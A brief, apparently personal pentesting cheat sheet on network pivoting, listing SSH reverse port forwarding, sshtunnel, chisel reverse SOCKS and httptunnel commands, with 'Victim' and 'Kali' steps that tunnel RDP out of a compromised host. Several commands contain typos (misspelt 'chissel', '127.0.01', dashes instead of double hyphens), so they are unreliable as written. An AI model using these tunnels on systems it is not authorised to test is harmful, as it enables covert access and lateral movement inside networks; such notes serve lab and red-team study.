Tools

SSHtunnel

ssh user@ip -R 2200:127.0.0.1:22 -f -N

sshtunnel -r user@127.0.0.1:2200 10.1.1.0/24

Chisel

chisel server --port 8008 --reverse --socks

chissel client http://IP:8008 R:5000:socks R:2200:127.0.01:22/tcp

HTTPTunnel

apt install httptunnel

Victim:

Ssh -L 0.0.0.0:8080:172.16.224.5:3389 student@localhost
Hts –forward-port localhost:8080 1234

Kali:

Htc –forward-port 8080 localhost:1234
Rdesktop 192.168.224.44:8080

Last updated